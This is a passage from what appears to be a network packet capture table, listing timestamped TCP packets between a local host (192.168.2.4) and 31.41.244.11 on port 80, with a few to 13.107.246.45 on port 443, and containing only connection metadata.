Nov 5, 2024 18:46:08.349595070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349621058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349630117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349662066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349663019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349672079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349682093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349694967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349715948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349858999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349869967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349880934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349891901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349905014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.349905968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349925995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349941015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.349996090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350008011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350017071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350028038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350033998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350060940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350070953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350187063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350197077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350208044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350217104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350222111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350248098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350271940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350358009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350368977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350379944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350400925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350415945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350501060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350511074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350521088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350528955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350538015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350542068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350560904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350581884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350682020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350692034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350696087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350701094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350706100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350714922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350719929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350729942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350752115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350769043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350831985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350841045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350850105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350860119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.350864887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.350897074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351003885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351015091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351042986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351067066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351072073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351082087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351090908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351100922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351109982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351115942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351120949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351130962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351133108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351155043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351176977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351197004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351237059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351382017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351394892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351403952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351413965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351425886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351458073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351530075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351540089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351548910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351558924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351567984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351573944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351578951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351589918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351602077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351612091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351625919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351819992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351830959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351840019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351850033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351862907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351883888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.351963997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351977110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.351985931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352009058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352024078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352127075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352171898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352199078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352210045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352224112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352233887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352246046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352267027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352345943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352360964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352372885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352381945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352401972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352511883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352551937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352679968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352689028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352700949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352716923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352731943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352854013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352864027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352874041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352883101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.352897882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352919102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.352999926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353012085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353025913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353035927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353037119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353049994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353061914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353064060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353094101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353102922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353149891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353162050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353172064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353179932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353190899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353193998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353200912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353208065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353240967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353336096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353344917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353374004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353401899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353604078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353612900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353621960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353632927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353642941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353657961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353754044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353765011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353774071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353782892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353794098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353797913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353804111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353813887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353816032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353823900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353833914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353840113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353854895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353872061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353910923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353919983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353929043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353940964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353951931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353952885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353962898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.353976011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.353998899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354065895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354078054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354088068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354100943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354131937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354226112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354243040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354253054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354263067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354270935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354284048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354284048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354295015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354300022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354305029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354311943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354315996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.354332924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354360104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.354676962 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.355030060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355041027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355051994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355067015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355074883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355079889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355091095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355097055 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.355102062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355114937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355154037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355163097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355175018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355182886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355194092 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.355197906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355216026 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.355216026 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.355225086 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.355232000 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.355254889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355339050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355350971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355361938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.355382919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.355403900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.358081102 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.358138084 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.358227015 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.358393908 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.358407974 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.470035076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470047951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470058918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470093966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470105886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470127106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470298052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470314026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470346928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470357895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470367908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470391035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470423937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470429897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470438957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470483065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470577955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470623016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470675945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470704079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470714092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470725060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470733881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470753908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470773935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470797062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470845938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470871925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470880985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470906973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470915079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470920086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470925093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470925093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470947027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.470963955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.470987082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471061945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471070051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471076012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471087933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471096039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471101999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471110106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471115112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471128941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471129894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471152067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471163034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471184969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471195936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471214056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471223116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471231937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471240044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471241951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471262932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471271992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471281052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471282959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471318960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471323967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471334934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471344948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471369982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471374035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471393108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471417904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471440077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471448898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471489906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471513033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471527100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471539021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471560001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471581936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471591949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471591949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471602917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471626997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471637011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471669912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471678972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471719980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471723080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471759081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471776962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471786022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471834898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471844912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471848011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471854925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471868992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471873999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471889019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471896887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471904039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471905947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471920013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471951962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.471985102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.471996069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472002029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472004890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.472024918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.472038031 CET	80	49804	31.41.244.11	192.168.2.4
